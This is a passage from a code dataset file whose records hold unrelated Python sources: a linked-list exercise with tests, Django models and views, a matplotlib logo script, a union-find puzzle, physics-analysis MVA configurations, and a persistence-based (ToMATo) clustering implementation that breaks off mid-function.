exec(code, ctx)\n# dis.dis(code.co_consts[0])\n# dis.dis(code.co_consts[1])\n\n# try:\n# parse_expr('f(a=1, b)\\n')\n# except SyntaxError:\n# 
print('good')\n#\n# from bytecode import Bytecode, Instr, Label\n# bc = Bytecode()\n# bc.append(Instr(\"BUILD_MAP\", 0))\n# bc.append(Instr(\"LOAD_GLOBAL\", \"range\"))\n# bc.append(Instr(\"LOAD_CONST\", 2))\n# bc.append(Instr(\"CALL_FUNCTION\", 1, lineno=2))\n#\n# l1 = Label()\n# l2 = Label()\n# bc.append(Instr(\"GET_ITER\"))\n# bc.append(l1)\n# bc.append(Instr(\"FOR_ITER\", l2))\n# bc.append(Instr(\"STORE_FAST\", \"i\"))\n# bc.append(Instr(\"LOAD_CONST\", 2))\n# bc.append(Instr(\"LOAD_CONST\", 1, lineno=1))\n# bc.append(Instr(\"MAP_ADD\", 2))\n# bc.append(Instr(\"JUMP_ABSOLUTE\", l1))\n# bc.append(l2)\n# bc.append(Instr(\"RETURN_VALUE\", ))\n#\n# code = bc.to_code()\n# print(eval(code))\n# dis.show_code(code)\n# dis.dis(code)\n","sub_path":"snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"123664324","text":"import unittest\n\n\nclass Node(object):\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n\nclass SingleList(object):\n def __init__(self):\n self.head = None\n self.tail = None\n\n\n def insert_after(self, node, data):\n new_node = Node(data, node.next)\n node.next = new_node\n if self.tail == node:\n self.tail = new_node\n\n\n def insert_front(self, data):\n new_node = Node(data, self.head)\n self.head = new_node\n if self.tail is None:\n self.tail = self.head\n\n\n def insert_back(self, data):\n if self.tail is None:\n self.head = self.tail = Node(data)\n else:\n self.insert_after(self.tail, data)\n\n\n def __iter__(self):\n current = self.head\n while current is not None:\n yield current\n current = current.next\n # falling off the end stops the generator; raising StopIteration here is a RuntimeError under PEP 479\n\n\ndef remove_duplicates(single_list):\n seen_elements = set()\n node = single_list.head\n prev_node = None\n while node is not None:\n if node.data in seen_elements:\n prev_node.next = node.next\n else:\n seen_elements.add(node.data)\n prev_node = node\n node = node.next\n\n\ndef remove_duplicates_no_set(single_list):\n node = single_list.head\n runner = None\n\n while node is not None:\n prev_runner = node\n runner = node.next\n while runner is not None:\n if node.data == runner.data:\n prev_runner.next = runner.next\n else:\n # only advance the trailing pointer past nodes that are kept\n prev_runner = runner\n runner = runner.next\n node = node.next\n\n\nclass TestSingleList(unittest.TestCase):\n def test_init(self):\n l = SingleList()\n self.assertIsNone(l.head)\n self.assertIsNone(l.tail)\n l.insert_front(5)\n self.assertEqual(l.head.data, 5)\n self.assertEqual(l.tail.data, 5)\n l = SingleList()\n l.insert_back(3)\n self.assertEqual(l.head.data, 3)\n self.assertEqual(l.tail.data, 3)\n\n\n def test_insert_front(self):\n l = SingleList()\n l.insert_front(5)\n self.assertEqual(l.head.data, 5)\n self.assertEqual(l.tail.data, 5)\n l.insert_front(3)\n self.assertEqual(l.head.data, 3)\n self.assertEqual(l.tail.data, 5)\n\n\n def test_insert_back(self):\n l = SingleList()\n l.insert_back(5)\n self.assertEqual(l.head.data, 5)\n self.assertEqual(l.tail.data, 5)\n l.insert_back(3)\n self.assertEqual(l.head.data, 5)\n self.assertEqual(l.tail.data, 3)\n\n def test_remove_duplicates(self):\n l = SingleList()\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [])\n\n l.insert_back(5)\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(5)\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(5)\n l.insert_back(5)\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(3)\n 
l.insert_front(3)\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [3, 5])\n\n\n def test_remove_duplicates_no_set(self):\n l = SingleList()\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [])\n\n l.insert_back(5)\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(5)\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(5)\n l.insert_back(5)\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(3)\n l.insert_front(3)\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [3, 5])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/main/python/chap02LinkedLists/ex2_01_dupes.py","file_name":"ex2_01_dupes.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"178526597","text":"from django.db import models\nfrom ckeditor.fields import RichTextField\nfrom django.urls import reverse\n\n\nclass Category(models.Model):\n slug = models.SlugField(primary_key=True, max_length=50)\n title = models.CharField(max_length=50,)\n parent = models.ForeignKey('self', related_name='children', null=True, blank=True, on_delete=models.CASCADE)\n\n def __str__(self):\n if self.parent:\n return f'{self.parent} -> {self.title}'\n return self.title\n\n @property\n def get_children(self):\n if self.children:\n return self.children.all()\n return False\n\n\nclass Product(models.Model):\n STATUS_CHOICES = (\n ('in stock', 'В наличии'),\n ('out of stock', 'Нет в наличии')\n )\n\n title = models.CharField(max_length=50,)\n category = models.ManyToManyField(Category, related_name='products',)\n description = RichTextField(null=True, blank=True)\n image = models.ImageField(upload_to='images/')\n price = models.DecimalField(max_digits=12, decimal_places=2)\n stock = models.CharField(choices=STATUS_CHOICES, max_length=50)\n created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.title\n\n @property\n def get_absolute_url(self):\n return reverse('product_detail', args=[str(self.id)])\n\n def get_category_name(self):\n return self.category\n\n class Meta:\n ordering = ['-created']\n\n\n\n","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"51771535","text":"#!/usr/bin/env python\n\nfrom subprocess import call\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle, Rectangle\n\n\ndef get_molecule_positions(theta=0, shrink=0.25, r=0.6):\n\n L = 1.0\n bond_ratio = 0.55\n phi = 103.99987509868838 / 180 * np.pi\n theta = theta / 180 * np.pi\n M = np.array([\n [np.cos(theta), np.sin(theta)],\n [-np.sin(theta), np.cos(theta)]\n ])\n pos = np.array([\n [0.0, 0.0],\n [1.0, 0.0],\n [np.cos(phi), np.sin(phi)],\n ])\n pos = np.dot(M, pos.T).T * shrink\n r1 = L / (bond_ratio + 1)\n r2 = r1 * bond_ratio\n\n return np.array([r1, r2, r2]) * shrink, pos\n\n\nfigure = plt.figure(\n figsize=(3.0, 4.0)\n)\nax = plt.subplot()\nax.set_aspect('equal')\nax.axis('off')\n\n############################################################\nR0 = 1.0\nC0 = Circle(\n (0.0, 0.0), radius=R0,\n facecolor='k',\n alpha=0.7,\n)\nC1 = Circle(\n (0.0, 0.0), radius=0.55 * R0,\n 
facecolor='w'\n)\n\nax.add_patch(C0)\nax.add_patch(C1)\n\n############################################################\n\nMOLCOLORS = ['r', 'b', 'b']\nR, P = get_molecule_positions(theta=-10)\nfor ii in range(3):\n cc = Circle(\n P[ii], radius=R[ii],\n facecolor=MOLCOLORS[ii],\n alpha=0.6\n )\n ax.add_patch(cc)\n\nR, P = get_molecule_positions(theta=-120, shrink=0.15)\nP += np.array([-0.2, -0.2])\nfor ii in range(3):\n cc = Circle(\n P[ii], radius=R[ii],\n facecolor=MOLCOLORS[ii],\n alpha=0.5\n )\n ax.add_patch(cc)\n\nR, P = get_molecule_positions(theta=120, shrink=0.1)\nP += np.array([0.2, -0.2])\nfor ii in range(3):\n cc = Circle(\n P[ii], radius=R[ii],\n facecolor=MOLCOLORS[ii],\n alpha=0.4\n )\n ax.add_patch(cc)\n############################################################\n\nNAMD = [x.upper() for x in 'namd']\nstart_angle = 60.0 / 180. * np.pi\nfor ii in range(4):\n tc = np.exp(1j * (start_angle + ii * np.pi / 2))\n cc = Circle(\n (tc.real, tc.imag), radius=0.4,\n facecolor='white',\n # alpha=0.9\n )\n ax.add_patch(cc)\n cc = Circle(\n (tc.real, tc.imag), radius=0.32,\n facecolor='red',\n alpha=0.5\n )\n ax.add_patch(cc)\n ax.text(tc.real, tc.imag - 0.05, NAMD[ii],\n ha=\"center\",\n va=\"center\",\n fontsize=52,\n # family='monospace',\n color='white',\n fontweight='bold',\n transform=ax.transData,\n fontname='Cooper Black',\n # bbox=dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n )\n\n############################################################\n\nax.plot([-1.4, 1.4], [-1.4, -1.4], 'k-', lw=5.0)\n\n############################################################\nTEXT = 'HEFEI'\nTPOS = np.linspace(-1.1, 1.1, 5, endpoint=True)\nTROT = [-19.05462068, 1.69593734, -11.93570325, -0.39501574, 22.31639076]\n# TROT = [-16.59700324, -7.07637502, 29.74676562, 7.06633301, 22.90883817]\n# TROT = np.random.uniform(-1, 1, 5) * 30\n# print(TROT)\n\nTCLR = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\nfor ii in range(5):\n h = TPOS[ii]\n v = -2.05 + np.sin(ii * np.pi / 2) * 0.2\n # v = -1.95\n T = plt.text(h, v, TEXT[ii],\n ha=\"center\",\n va=\"center\",\n fontsize=52,\n # family='monospace',\n color='white', alpha=0.95,\n rotation=TROT[ii],\n fontweight='bold',\n transform=ax.transData,\n fontname='Cooper Black',\n # bbox=dict(pad=0.1, lw=0.0, boxstyle='circle', facecolor='green', alpha=0.6)\n )\n # ax.plot([h,], [v], marker='o', ms=5)\n\n # box = T.get_window_extent().inverse_transformed(ax.transData)\n # box_w = box.x1 - box.x0\n # box_h = box.y1 - box.y0\n # RR = Rectangle(\n # (box.x0, box.y0 + 0.1), box_w, box_h,\n # facecolor='green'\n # )\n # ax.add_patch(RR)\n\n cc = Circle(\n (h, v + 0.05), radius=0.3,\n # facecolor='green',\n facecolor=TCLR[ii],\n alpha=0.6\n )\n ax.add_patch(cc)\n\n\nax.set_xlim(-1.5, 1.5)\nax.set_ylim(-2.5, 1.4)\n\nplt.tight_layout(pad=0.1)\nplt.savefig('logo.png', dpi=300)\n# plt.show()\n\n# from subprocess import call\n# call('feh -xdF logo.png'.split())\n","sub_path":"logo/logo.py","file_name":"logo.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644688081","text":"import redis, pickle, threading\n\nfrom django.shortcuts import render, render_to_response\nfrom django.http import HttpResponse\nfrom .form import BattleSettingsForm\nfrom .factory import Factory\n\ndef index(request):\n return render(request, 'index.html', {'form': BattleSettingsForm})\n\n\ndef start_battle(request):\n battlefield = Factory(armies_num=int(request.POST.get('armies_num')),\n 
squads_per_army=int(request.POST.get('squads_per_army')),\n operators_per_veh=int(request.POST.get('operators_per_veh')),\n soldier_recharge=int(request.POST.get('soldier_recharge')),\n soldier_health=int(request.POST.get('soldier_health')),\n vehicle_recharge=int(request.POST.get('vehicle_recharge')),\n vehicle_health=int(request.POST.get('vehicle_health')),\n strategy=request.POST.get('strategy')\n ).create_battlefield()\n t = threading.Thread(target=battlefield.start, args=(), kwargs={})\n t.setDaemon(True)\n t.start()\n return render(request, 'result.html')\n\n\ndef update_state(request):\n r = redis.StrictRedis(host='localhost', port=6379, db=0)\n battle_stats = pickle.loads(r.get('battle_stats'))\n battle_result = r.get('result')\n return render_to_response('stats.html', {'battle_stats': battle_stats, 'result': battle_result})\n","sub_path":"classroom/django_databases_example/django_battle/battle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158798109","text":"import sys\nsys.stdin = open('그룹나누기.txt')\ndef find_set(x):\n if x != people[x]:\n\n return find_set(people[x])\n\n return x\n\ndef Union(x,y):\n a = find_set(x)\n b = find_set(y)\n\n if a < b:\n people[b] = a\n return\n elif b < a:\n people[a] = b\n return\n else:\n return\n\nT = int(input())\nfor tc in range(T):\n N ,M = map(int, input().split())\n arr = list(map(int, input().split()))\n people = list(i for i in range(N+1))\n for i in range(M):\n Union(arr[i*2], arr[i*2 +1])\n cnt = 0\n for i in range(1,N+1):\n if i == people[i]:\n cnt +=1\n\n\n print('#{} {}'.format(tc+1,cnt))\n\n\n","sub_path":"08_algorithm/28_algorithm2019.09.24/그룹나누기.py","file_name":"그룹나누기.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"403609463","text":"import FWCore.ParameterSet.Config as cms\n\nfrom flashgg.Taggers.flashggTags_cff import UnpackedJetCollectionVInputTag, UnpackedPuppiJetCollectionVInputTag\n\n\n# legacy VBF MVA\nflashggVBFMVALegacy = cms.EDProducer('FlashggVBFMVALegacyProducer',\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n inputTagJets = UnpackedJetCollectionVInputTag,\n UseLegacyMVA = cms.untracked.bool(True),\n MinDijetMinv = cms.double(0.0),\n vbfMVAweightfile = cms.FileInPath(\"flashgg/Taggers/data/TMVA_dijet_sherpa_scalewt50_2evenb_powheg200_maxdPhi_oct9_Gradient.weights.xml\"),\n)\n\n# Legacy DiPhoDiJet MVA\nflashggVBFDiPhoDiJetMVALegacy = cms.EDProducer('FlashggVBFDiPhoDiJetMVAProducer',\n DiPhotonTag=cms.InputTag('flashggDiPhotons'),\n VBFMVAResultTag=cms.InputTag('flashggVBFMVALegacy'),\n MVAResultTag=cms.InputTag('flashggDiPhotonMVA'),\n UseLegacyMVA = cms.untracked.bool(True),\n vbfDiPhoDiJetMVAweightfile = cms.FileInPath(\"flashgg/Taggers/data/TMVA_vbf_dijet_dipho_evenbkg_scaledwt50_maxdPhi_Gradient.weights.xml\"),\n)\n\n\n# new test VBF MVA with CHS Jets\nflashggVBFMVA = cms.EDProducer ('FlashggVBFMVAProducer',\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n inputTagJets = UnpackedJetCollectionVInputTag,\n MVAMethod = cms.untracked.string(\"BDTG\"),\n MinDijetMinv = cms.double(0.0),\n vbfMVAweightfile = cms.FileInPath(\"flashgg/Taggers/test/MVATraining/weights/Flashgg_VBF_CHS_BDTG.weights.xml\"),\n)\n\n# new test DiPhoDiJet MVA\nflashggVBFDiPhoDiJetMVA = cms.EDProducer('FlashggVBFDiPhoDiJetMVAProducer',\n DiPhotonTag=cms.InputTag('flashggDiPhotons'),\n 
VBFMVAResultTag=cms.InputTag('flashggVBFMVA'),\n UseLegacyMVA = cms.untracked.bool(False),\n MVAResultTag=cms.InputTag('flashggDiPhotonMVA'),\n vbfDiPhoDiJetMVAweightfile = cms.FileInPath(\"flashgg/Taggers/data/Flashgg_DiPhoDiJet_BDT.weights.xml\"),\n)\n\n\n\n# new VBF with PUPPI Jets\nflashggVBFMVAPUPPI = cms.EDProducer('FlashggVBFMVAProducer',\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n inputTagJets = UnpackedPuppiJetCollectionVInputTag,\n MVAMethod = cms.untracked.string(\"BDTG\"),\n MinDijetMinv = cms.double(0.0),\n vbfMVAweightfile = cms.FileInPath(\"flashgg/Taggers/test/MVATraining/weights/Flashgg_VBF_PUPPI_BDTG.weights.xml\"),\n)\n\n\n# new test DiPhoDiJet MVA\nflashggVBFDiPhoDiJetMVAPUPPI = cms.EDProducer('FlashggVBFDiPhoDiJetMVAProducer',\n DiPhotonTag = cms.InputTag('flashggDiPhotons'),\n VBFMVAResultTag = cms.InputTag('flashggVBFMVAPUPPI'),\n UseLegacyMVA = cms.untracked.bool(False),\n MVAResultTag = cms.InputTag('flashggDiPhotonMVA'),\n vbfDiPhoDiJetMVAweightfile = cms.FileInPath(\"flashgg/Taggers/data/Flashgg_DiPhoDiJet_BDT.weights.xml\"),\n)\n\n\n","sub_path":"Taggers/python/flashggVBFMVA_cff.py","file_name":"flashggVBFMVA_cff.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"594744126","text":"import os\nimport sys\n# import scipy as sp\nfrom scipy.spatial import distance\n\nfrom sklearn.datasets import make_blobs, make_moons, make_circles\n\nimport numpy as np\n\nimport networkx as nx\nfrom itertools import product\n\nfrom itertools import combinations\n#from scipy.sparse import dok_matrix\nfrom operator import add\n\nfrom sklearn.neighbors import BallTree\n\n# ---- FUNCTIONS ----\n\n\ndef fit_kde_estimator(input_data: np.ndarray,\n bandwidth: 'np.linspace' = np.linspace(0.1, 1.0, 30),\n cross_validation: int = 2,\n verbose: bool = False,\n **kwargs) -> np.ndarray:\n '''\n [] DESCRIPTION []\n []\n <> PARAMETERS <>\n <> input_data: np.ndarray = numpy array of shape (n_samples, n_features)\n <>** cross_validation: int = is the number of cross validation folds to use during the fitting\n DEFAULT: 2\n <>** bandwidth: np.linspace = is the linspace of bandwidths to search over\n DEFAULT: np.linspace(0.1, 1.0, 30)\n <>** verbose: bool = whether the algorithm should be verbose\n DEFAULT: False\n <>** other_params = the same as sklearn constructor for `KernelDensity`\n\n >< RETURNS ><\n >< fitted sklearn KDE estimator\n ! NOTES !\n ! NOTE, we were following: https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/\n '''\n # ---- IMPORT -----------------------------------\n from sklearn.model_selection import GridSearchCV\n from sklearn.neighbors import KernelDensity\n\n # ---- CODE -------------------------------------\n _grid = GridSearchCV(KernelDensity(kernel='gaussian', **kwargs),\n {'bandwidth': bandwidth},\n cv=cross_validation)\n\n # FIT THE `input_data` TO PRODUCE BEST `KDE`\n _grid.fit(input_data)\n\n if verbose:\n print('BEST BANDWIDTH: {}'.format(_grid.best_params_))\n\n return _grid.best_estimator_\n\n\ndef fit_single_kde_estimator(input_data: np.ndarray, **kwargs):\n # ---- IMPORT -----------------------------------\n from sklearn.model_selection import GridSearchCV\n from sklearn.neighbors import KernelDensity\n\n # ---- CODE -------------------------------------\n _kde = KernelDensity(**kwargs)\n\n _kde.fit(input_data)\n\n return _kde\n\n\ndef evaluate_kde_estimator(fitted_estimator: 'sklearn `kde` estimator',\n input_data: np.ndarray)-> np.ndarray:\n '''\n <> PARAMETERS <>\n <> fitted_estimator: sklearn `kde` estimator\n <> input_data: np.ndarray\n\n >< RETURNS ><\n >< np.ndarray = is exponentialized\n\n '''\n # ----- CODE --------------------------------------\n # since it is the `kde` estimator you must exponentialize it\n return np.exp(fitted_estimator.score_samples(input_data))\n\n\nclass Simplicial_complex():\n\n def __init__(self, simplices: list = []):\n '''\n ADD DOCSTRING\n '''\n # ----- CODE --------------------------------\n self.import_simplices(simplices=simplices)\n\n '''\n HELPER FUNCTIONS\n '''\n\n def import_simplices(self, simplices: list = []):\n '''\n ADD DOCSTRING\n '''\n # ----- CODE --------------------------------\n\n self._simplices = map(lambda simplex: tuple(sorted(simplex)), simplices)\n\n '''\n MAIN FUNCTIONS\n '''\n\n def faces(self):\n '''\n ADD DOCSTRING\n ! NOTE:\n the notion of `faces` is different from the notion of `boundary`\n\n '''\n # ----- CODE --------------------------------\n self._faceset = set()\n for simplex in self._simplices:\n _numnodes = len(simplex)\n\n for r in range(_numnodes, 0, -1):\n for face in combinations(simplex, r):\n self._faceset.add(face)\n\n return self._faceset\n\n def n_faces(self, dim: int):\n '''\n ADD DOCSTRING\n\n '''\n # ----- CODE --------------------------------\n return filter(lambda face: len(face) == dim+1, self._faceset)\n\n\nclass Vietoris_Rips_complex(Simplicial_complex):\n\n def __init__(self, points,\n epsilon,\n labels=None,\n distfcn=distance.euclidean):\n '''\n ADD DOCSTRING\n '''\n # ------ CODE --------------------------------------------------------\n self._pts = points\n self._labels = range(len(self._pts)) if labels == None or\\\n len(labels) != len(self._pts) else labels\n\n self._epsilon = epsilon\n self._distfcn = distfcn\n\n self.network = self.construct_network(\n self._pts, self._labels, self._epsilon, self._distfcn)\n\n #self.import_simplices(map(tuple, list(nx.find_cliques(self.network) )))\n self.import_simplices(map(tuple, nx.find_cliques(self.network)))\n\n '''\n HELPER FUNCTIONS\n '''\n\n def print_complex(self):\n print(list(nx.find_cliques(self.network)))\n\n def construct_network(self,\n points,\n labels,\n epsilon,\n distfcn):\n '''\n ADD DOCSTRING\n '''\n g = nx.Graph()\n g.add_nodes_from(labels)\n\n zips, spiz = zip(points, labels), zip(points, labels)\n\n for pair in product(zips, spiz):\n\n if pair[0][1] != pair[1][1]:\n dist = distfcn(pair[0][0], pair[1][0])\n if dist and dist < epsilon:\n g.add_edge(pair[0][1], pair[1][1])\n\n return g\n\n\nclass Union_find():\n '''\n this class implements the Union - find data structure\n\n\n '''\n # Initialization\n\n def __init__(self):\n\n self.weight_of_root = {}\n self._object_id_to_parent_id = {}\n\n self.id_to_object = {}\n self.objects_to_id = {}\n\n # Insert objects among the already existing ones\n def insert_objects(self, objects: \"iterable over `objects`\"):\n '''\n add docstring\n '''\n # ------- CODE ---------------------------\n for object in objects:\n _ = self.find(object)\n\n def is_object_in(self, object)->bool:\n\n return object in self.objects_to_id\n\n # Find a given object / build it if non-existing\n\n def find(self, object)->'object':\n '''\n\n <> object: must be hashable//lookable object\n\n >< ALWAYS RETURNS THE OBJECT\n this finds an object and returns the object if it exists\n if the object does not exist, it will put the object into the data structure\n '''\n # ------ CODE ------------------------------\n if not object in self.objects_to_id:\n\n # this will determine the unique ID for a new object\n # since the object was not among `object_to_id` set, it must be a new root\n _new_root_id = len(self.objects_to_id)\n self.objects_to_id[object] = _new_root_id\n\n # this means that the new root has only one (self) branch\n # in general the weight of the root of the tree measures how many\n # objects are attached to the root\n self.weight_of_root[_new_root_id] = 1\n\n # this creates the inverse dictionary, for given unique id you will get the object\n self.id_to_object[_new_root_id] = object\n\n # this creates the parent pointer\n # since this is a new root, the root's parent is always the root itself\n self._object_id_to_parent_id[_new_root_id] = _new_root_id\n\n return object\n\n # ok if the object is in the object dictionary\n # this basically looks for the root\n #\n # _list_of_nodes_id: stores the list of nodes as you are searching for root\n # you start with the current id\n _list_of_nodes_id = [self.objects_to_id[object]]\n\n # now look for parent id\n _parent_id = self._object_id_to_parent_id[_list_of_nodes_id[-1]]\n\n # this walks up the parent ids until the root is reached\n while _parent_id != _list_of_nodes_id[-1]:\n _list_of_nodes_id += [_parent_id]\n\n _parent_id = self._object_id_to_parent_id[_parent_id]\n\n # it is the lazy type of union since it flattens up all the tree members\n # and all of them have the same root\n #\n # this basically flattens the search tree\n for _node_id in _list_of_nodes_id:\n self._object_id_to_parent_id[_node_id] = _parent_id\n\n # this returns the root object\n return self.id_to_object[_parent_id]\n\n # Link two different objects in a same distinct set\n def union(self, object_1, object_2):\n '''\n add docstring\n '''\n\n # this looks up the roots of object_1 and object_2\n _root_1, _root_2 = self.find(object_1), self.find(object_2)\n\n # if roots are equal ... you are done\n # if they are different, you must merge them\n # who is the root after merge depends on the weight of the root\n # the smaller root weight is merged into the bigger root weight\n if _root_1 != _root_2:\n\n # this looks for the root metadata, like root ids and root weights\n _root_1_id = self.objects_to_id[_root_1]\n _root_2_id = self.objects_to_id[_root_2]\n\n _root_weight_1 = self.weight_of_root[_root_1_id]\n _root_weight_2 = self.weight_of_root[_root_2_id]\n\n # just doing swap between roots if _root_weight_1 is smaller\n # SWAP\n if _root_weight_1 < _root_weight_2:\n _root_1, _root_2, _root_1_id, _root_2_id, _root_weight_1, _root_weight_2 =\\\n _root_2, _root_1, _root_2_id, _root_1_id, _root_weight_2, _root_weight_1\n\n # after swap we have guaranteed that whatever is stored in `root_1` is the correct biggest root\n self.weight_of_root[_root_1_id] = _root_weight_1 + _root_weight_2\n\n # we know that we can erase `_root_2` from the set that is reserved only for roots\n del(self.weight_of_root[_root_2_id])\n\n # and point _root_2_id to a new root == root_1_id\n self._object_id_to_parent_id[_root_2_id] = _root_1_id\n\n\nclass Tomato():\n\n def __init__(self, X: np.ndarray, density_estimation: str, **kwargs):\n '''\n <> PARAMETERS <>\n <> X: np.ndarray = data should be normalized to have values between <-1, 1> in all dimensions\n reason for that is that then the largest scale is\n <> density_estimation: str = is a restricted string {'kde_gauss_grid_search', 'kde_tophat'}\n `kde_gauss_grid_search` = the global Gaussian kde estimator with a cross-validated bandwidth\n `kde_tophat` = a single kde estimator with a top-hat kernel\n '''\n\n # ------ CODE ------------------------\n '''\n (I) YOU MUST FIT THE KDE DENSITIES\n '''\n #\n print('fitting densities')\n if density_estimation == 'kde_gauss_grid_search':\n _densities = evaluate_kde_estimator(fit_kde_estimator(\n X, cross_validation=kwargs.get('cross_validation', 2)), X)\n\n elif density_estimation == 'kde_tophat':\n _densities = evaluate_kde_estimator(fit_single_kde_estimator(X, kernel='tophat'), X)\n\n else:\n raise NotImplementedError\n\n '''\n (II) FIND THE ORDERING ON THE DATA, I.E. 
CREATE THE \\tilde{f} FUNCTION\n '''\n # `_data_store` stores a list of ordered data by the point density estimates in non-increasing fashion\n _data_store = sorted(zip(X.tolist(), _densities.tolist()),\n key=lambda x: -x[-1])\n\n '''\n (III) CREATE ORDERED DATA AS WELL AS THE `VR` COMPLEX\n '''\n\n # lets get just ordered densities, that will serve for quick lookup of pseudogradinets\n # as `tilde_f`\n self._tilde_f = np.array(list(map(lambda x: x[1], _data_store)))\n\n # extract only the ordered data\n self._ordered_data = np.array(list(map(lambda x: x[0], _data_store)))\n\n # FIX THIS ::: CREATE AN ALGORITHM THAT CAN FIND EPSILON AUTOMATICALLY\n # this can be done by looking for such an epsilon that ::: <- look into the paper\n #self.refit_vietoris_rips_graph(epsilon = kwargs.get('VR_EPSILON', 0.8))\n\n def fit_vietoris_rips_graph(self, epsilon: float):\n '''\n ADD DOCSTRING\n '''\n self._graph_type = 'vietoris_rips_complex'\n self._graph = Vietoris_Rips_complex(\n self._ordered_data, epsilon=epsilon,\n labels=list(range(self._ordered_data.shape[0])))\n\n def fit_knn_graph(self, n: int, **kwargs):\n '''\n ADD DOCSTRING\n '''\n self._graph_type = 'knn_complex'\n self._num_neighbors = n\n self._graph = BallTree(self._ordered_data, leaf_size=kwargs.get('leaf_size', 42))\n\n # actual\n\n def fit(self, tau: float = 1e-2)->'union find object':\n '''\n ADD DOCSTRING\n '''\n # ------ CODE ------------------------------\n # create UNION-FIND data sctructure\n _U = Union_find()\n\n # create the `g` vector == the pseudo gradient vector\n #_g_vector = np.full((len(self._tilde_f),), -1, np.int64)\n\n # create the `r` vector == the root vector\n #_r_vector = np.full((len(self._tilde_f), ), -1, np.int64)\n\n # at the beginning is every index its own root\n #_r_vector = np.array(list(range(len(self._tilde_f))))\n\n # this will be useful for plotting\n # well I will store (dens, True) = it means cluster was born\n # well I will store (dens, False) = it means that some density died\n _persistence_data = {}\n for idx in range(len(self._tilde_f)):\n\n '''\n (I) FIND NEIGHBORHOOD SET\n '''\n # returns the neighborhood of indices that have HIGHER densities than current idx :: I.E. PSEUDO-GRADIENTS\n # i.e. 
they have lower indices than the current index\n\n if self._graph_type == 'vietoris_rips_complex':\n print('using {} graph'.format(self._graph_type))\n _N = np.array(\n list(filter(lambda ind: ind < idx, self._graph.network[idx])))\n\n elif self._graph_type == 'knn_complex':\n _dist, _ind = self._graph.query(self._ordered_data[idx: idx + 1],\n k=self._num_neighbors)\n\n _N = np.array(list(filter(lambda ind: ind < idx, _ind[0])))\n else:\n raise ValueError('GRAPH NOT FOUND.')\n\n '''\n (II) CREATE UNION FIND // UPDATE UNION FIND\n '''\n # cluster is born\n\n if self._tilde_f[idx] not in _persistence_data:\n\n # the if statement should avoid zeroing something that was there before,\n # mathematically this should `almost` never happen, but because of floating point arithmetic, it might\n _persistence_data[self._tilde_f[idx]] = 0.0\n\n if _N.size > 0:\n\n # if _N is not empty ::: then find the neighbor with the highest density, i.e. the pseudo-gradient\n _pseudogradient = _N[np.argmax(self._tilde_f[_N])]\n\n # find root for `_pseudogradient`\n _parent = _U.find(_pseudogradient)\n\n # do `UNION` of idx and _parent\n _U.union(_parent, idx)\n\n # also means that `idx` density dies, at the level _tilde_f[idx]\n _persistence_data[self._tilde_f[idx]] = self._tilde_f[idx]\n\n for j in _N:\n # find root for j\n _parent_j = _U.find(j)\n\n # this is the condition that decides to which root the current node belongs\n _parents_root_densities = [self._tilde_f[_parent], self._tilde_f[_parent_j]]\n\n # what does this mean?\n # it means the two roots differ and the weaker root's peak density is below\n # _tilde_f[idx] + tau (its prominence is at most tau), so the clusters are merged\n if _parent != _parent_j and min(_parents_root_densities) < self._tilde_f[idx] + tau:\n\n # only in this case conglomerate `parent_j` and `_parent`\n # means that `_parent` density dies\n _U.union(_parent_j, _parent)\n\n # this means that _parent density was killed at the level _tilde_f[idx]\n _persistence_data[self._tilde_f[_parent]] = self._tilde_f[idx]\n\n # update `_parent`\n _parent = _U.find(_parent_j)\n\n else:\n # if _N is empty :: then add `idx` into the union find data structure\n\n _U.insert_objects([idx])\n\n # also store the root for `idx` in root vector\n #_r_vector[idx] = idx\n\n return _U, _persistence_data\n\n\nclass ClusterGenerator:\n\n # Initialization\n # structure refers to the type of data to generate\n # n_samples refers to the amount of data to deal with\n # randomize is the random state for reproducibility\n def __init__(self, structure='blobs', n_samples=1500, randomize=42):\n\n self.structure = structure\n self.n_samples = n_samples\n self.randomize = randomize\n\n # Function aiming at generating samples\n def generate(self):\n\n if self.structure == 'anisotropy':\n\n x, y = make_blobs(n_samples=self.n_samples, random_state=self.randomize)\n vec = [[0.60834549, -0.63667341], [-0.40887718, 0.85253229]]\n return 